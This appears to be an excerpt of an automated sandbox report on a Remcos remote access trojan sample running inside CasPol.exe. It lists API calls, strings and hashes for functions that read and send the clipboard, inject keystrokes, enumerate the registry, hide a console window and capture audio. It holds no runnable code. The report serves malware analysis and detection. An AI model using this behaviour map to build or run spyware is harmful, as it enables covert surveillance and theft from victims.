                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                    • String ID: .part
                                                                                                                    • API String ID: 1303771098-3499674018
                                                                                                                    • Opcode ID: cf57b88e8736247bab96c122cc0a48a1b12f1b6bcdae9bb4a006722ccb69ac59
                                                                                                                    • Instruction ID: 92ff4720e6a7c249f3c3ae71a82c25b1888123647972eaae8327678ea1ca1cb3
                                                                                                                    • Opcode Fuzzy Hash: cf57b88e8736247bab96c122cc0a48a1b12f1b6bcdae9bb4a006722ccb69ac59
                                                                                                                    • Instruction Fuzzy Hash: 2131C4715083009FD210EF21DD459AFB7A8FB84315F40093FF9C6A21A1DB38AA48CB9A
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                                                      • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                                                      • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                                                      • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                                      • Part of subcall function 0041B16B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B183
                                                                                                                    • _wcslen.LIBCMT ref: 0041A906
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                    • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                    • API String ID: 3286818993-703403762
                                                                                                                    • Opcode ID: d1b129823d2eb871984bf039fa82585e8236e7331ec38122e0fed58a21493060
                                                                                                                    • Instruction ID: 668df6a2f2e8443cbe55da1b88d556a36153785c12b7582e9a7b6ce06fc50c8b
                                                                                                                    • Opcode Fuzzy Hash: d1b129823d2eb871984bf039fa82585e8236e7331ec38122e0fed58a21493060
                                                                                                                    • Instruction Fuzzy Hash: 4C217472B001046BDB04BAB58C96DEE366D9B85358F14093FF412B72D3EE3C9D9942A9
                                                                                                                    APIs
                                                                                                                    • AllocConsole.KERNEL32(00474358), ref: 0041BEC9
                                                                                                                    • GetConsoleWindow.KERNEL32 ref: 0041BECF
                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0041BEE2
                                                                                                                    • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BF07
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Console$Window$AllocOutputShow
                                                                                                                    • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                                                    • API String ID: 4067487056-2527699604
                                                                                                                    • Opcode ID: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                                                                                                                    • Instruction ID: 29466b5f89b818b32aee09a22b3208d506810ef61d6e100b210d0f7536d9046d
                                                                                                                    • Opcode Fuzzy Hash: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                                                                                                                    • Instruction Fuzzy Hash: 3F0121B1980304BAD600FBF29D4BFDD37AC9B14705F5004277648EB193E6BCA554466D
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE63,?,?,?,00449BB1,00000001,00000001,?), ref: 004499BA
                                                                                                                    • __alloca_probe_16.LIBCMT ref: 004499F2
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE63,?,?,?,00449BB1,00000001,00000001,?), ref: 00449A40
                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00449AD7
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B3A
                                                                                                                    • __freea.LIBCMT ref: 00449B47
                                                                                                                      • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                    • __freea.LIBCMT ref: 00449B50
                                                                                                                    • __freea.LIBCMT ref: 00449B75
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3864826663-0
                                                                                                                    • Opcode ID: 81d70c20703e66394a8e6e24da3589bfc2c015b76e7b2aedf7d205086cdaf592
                                                                                                                    • Instruction ID: 2fc013a73a1c4821613f4f7d6933c77eebbc764427e3f4eacb424f728eff0283
                                                                                                                    • Opcode Fuzzy Hash: 81d70c20703e66394a8e6e24da3589bfc2c015b76e7b2aedf7d205086cdaf592
                                                                                                                    • Instruction Fuzzy Hash: 0951F772610256AFFB259F61DC42EBBB7A9EB44714F14462EFD04D7240EB38EC40E668
                                                                                                                    APIs
                                                                                                                    • SendInput.USER32 ref: 00418B18
                                                                                                                    • SendInput.USER32(00000001,?,0000001C), ref: 00418B40
                                                                                                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B67
                                                                                                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B85
                                                                                                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BA5
                                                                                                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BCA
                                                                                                                    • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BEC
                                                                                                                    • SendInput.USER32(00000001,?,0000001C), ref: 00418C0F
                                                                                                                      • Part of subcall function 00418AC1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AC7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: InputSend$Virtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1167301434-0
                                                                                                                    • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                    • Instruction ID: 9e9d03405de643faf883966fb0167173931b0bf8c68e8067c58721a0feba7ae1
                                                                                                                    • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                                                                                    • Instruction Fuzzy Hash: 10318071248349AAE210DF65D841FDBFBECAFD9B44F04080FB98457191DBA4998C876B
                                                                                                                    APIs
                                                                                                                    • OpenClipboard.USER32 ref: 00415A46
                                                                                                                    • EmptyClipboard.USER32 ref: 00415A54
                                                                                                                    • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                    • OpenClipboard.USER32 ref: 00415A61
                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                    • CloseClipboard.USER32 ref: 00415A89
                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2172192267-0
                                                                                                                    • Opcode ID: bde6039006afd35cfa9b038592cd02174a0e4c19d1e344a24b2e8258caee1819
                                                                                                                    • Instruction ID: 21d753e14671b68e74bb0dc0c2a05280281c3050cfaacb3e005a94eaf945824a
                                                                                                                    • Opcode Fuzzy Hash: bde6039006afd35cfa9b038592cd02174a0e4c19d1e344a24b2e8258caee1819
                                                                                                                    • Instruction Fuzzy Hash: 1D0152312083009FC314BB75EC5AAEE77A5AFC0752F41457EFD06861A2DF38C845D65A
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __freea$__alloca_probe_16
                                                                                                                    • String ID: a/p$am/pm$fD
                                                                                                                    • API String ID: 3509577899-1143445303
                                                                                                                    • Opcode ID: e0c58fd508ac7f9020f233231798530ee610dc717e528da9a7e0b991552c4189
                                                                                                                    • Instruction ID: b3ac1812908cceb8a5e393dcdb4c984f4f77018dd86d4d200126c6f407000a93
                                                                                                                    • Opcode Fuzzy Hash: e0c58fd508ac7f9020f233231798530ee610dc717e528da9a7e0b991552c4189
                                                                                                                    • Instruction Fuzzy Hash: 45D10171900205EAFB289F68D9456BBB7B0FF06700F26415BE9019B349D37D9D81CB6B
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00447ECC
                                                                                                                    • _free.LIBCMT ref: 00447EF0
                                                                                                                    • _free.LIBCMT ref: 00448077
                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                                                                                                                    • _free.LIBCMT ref: 00448243
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 314583886-0
                                                                                                                    • Opcode ID: 83ba8f2d62c5e3ad5148b86fb09d723ebab1b028d42839a605bfd88c95d0b2fc
                                                                                                                    • Instruction ID: 19e3b7565c7c288d74bc5d2e619305edf95ef22548e2b541e8d8082bcdfeb5ac
                                                                                                                    • Opcode Fuzzy Hash: 83ba8f2d62c5e3ad5148b86fb09d723ebab1b028d42839a605bfd88c95d0b2fc
                                                                                                                    • Instruction Fuzzy Hash: 27C10671904205ABFB24DF698C41AAE7BB9EF45314F2441AFE484A7251EB388E47C758
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 269201875-0
                                                                                                                    • Opcode ID: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                                                                                                                    • Instruction ID: 4bbe003d1bf73c874d2a573eb0f11032bb863b1283a960f175a06077317d427c
                                                                                                                    • Opcode Fuzzy Hash: 5969c94153c7b7bc47658fb7421fb2dc5c6178a12c9a66a46f54a64434edbe96
                                                                                                                    • Instruction Fuzzy Hash: 9D61CE71D00205AFEB20DF69C842BAABBF5EB45320F14407BE844EB281E7759D45CB59
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                    • _free.LIBCMT ref: 00444096
                                                                                                                    • _free.LIBCMT ref: 004440AD
                                                                                                                    • _free.LIBCMT ref: 004440CC
                                                                                                                    • _free.LIBCMT ref: 004440E7
                                                                                                                    • _free.LIBCMT ref: 004440FE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$AllocateHeap
                                                                                                                    • String ID: Z7D
                                                                                                                    • API String ID: 3033488037-2145146825
                                                                                                                    • Opcode ID: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                                                    • Instruction ID: 35b293ba1399b13e66314f32d3a1361244e269274da5e60bce22b88c1773d583
                                                                                                                    • Opcode Fuzzy Hash: e789079c2bca6bbabae9b3291a6a7c0d52dcd5a72fb4a21e852c8be1410d12d6
                                                                                                                    • Instruction Fuzzy Hash: 1451D131A00604AFEB20DF66C841B6A77F4EF99724B14456EE909D7251E739EE118B88
                                                                                                                    APIs
                                                                                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A848,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A115
                                                                                                                    • __fassign.LIBCMT ref: 0044A190
                                                                                                                    • __fassign.LIBCMT ref: 0044A1AB
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1D1
                                                                                                                    • WriteFile.KERNEL32(?,00000000,00000000,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A1F0
                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,0044A848,00000000,?,?,?,?,?,?,?,?,?,0044A848,?), ref: 0044A229
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1324828854-0
                                                                                                                    • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                    • Instruction ID: e447b7b613fb78ded26f6ec2e5332222395caf0b7731ddcd5a4cfd0c244b89ef
                                                                                                                    • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                    • Instruction Fuzzy Hash: FB51C270E002499FEB10CFA8D881AEEBBF8FF09310F14416BE955E7351D6749A51CB6A
                                                                                                                    APIs
                                                                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10009C07,?,00000000,?,00000000,00000000), ref: 100094D4
                                                                                                                    • __fassign.LIBCMT ref: 1000954F
                                                                                                                    • __fassign.LIBCMT ref: 1000956A
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095AF
                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095E8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1324828854-0
                                                                                                                    • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                    • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                    • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                    • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                                    APIs
                                                                                                                    • ExitThread.KERNEL32 ref: 004017F4
                                                                                                                      • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                                                                                                                      • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                                                                                                                    • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                                      • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                    • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                                      • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                                                                                                                      • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                    • String ID: T=G$>G$>G
                                                                                                                    • API String ID: 1596592924-1617985637
                                                                                                                    • Opcode ID: 0791d136f547a9af6514cf1b022b19b97f5be84b099323165553b4a2d0e3f5ee
                                                                                                                    • Instruction ID: 0943ace0b6a80c7a2dd7ea0048a529cdefdd5a29547fab9333b46e46416e0a54
                                                                                                                    • Opcode Fuzzy Hash: 0791d136f547a9af6514cf1b022b19b97f5be84b099323165553b4a2d0e3f5ee
                                                                                                                    • Instruction Fuzzy Hash: D941F0716042008BC325FB75DDA6AAE73A4EB90318F00453FF50AAB1F2DF789985C65E
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                                                      • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                      • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                    • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                    • String ID: TUFTUF$>G$DG$DG
                                                                                                                    • API String ID: 3114080316-344394840
                                                                                                                    • Opcode ID: 2ba61fc1b2277f262010f0e17440aec044fc634041d42f3fb681f5f0ad845f97
                                                                                                                    • Instruction ID: 977689a643a5ec5a4c60f988ad8168500f8ba0dfdc14b2429fd77a11b5167535
                                                                                                                    • Opcode Fuzzy Hash: 2ba61fc1b2277f262010f0e17440aec044fc634041d42f3fb681f5f0ad845f97
                                                                                                                    • Instruction Fuzzy Hash: 9041A2316042009BC224F635D8A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                                    APIs
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00437ABB
                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AC3
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00437B51
                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B7C
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00437BD1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                    • String ID: csm
                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                    • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                    • Instruction ID: 71a827b8039fc8fef17eb0172cb9efd804432aff4b2936af944e1c8a38ed202f
                                                                                                                    • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                    • Instruction Fuzzy Hash: 07410870A04209DBCF20EF29C884A9FBBB4AF08328F149156E8556B352D739EE01CF95
                                                                                                                    APIs
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4500070405.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4500044191.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4500070405.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_10000000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                    • String ID: csm
                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                    • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                    • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                    • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                    • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                      • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                      • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
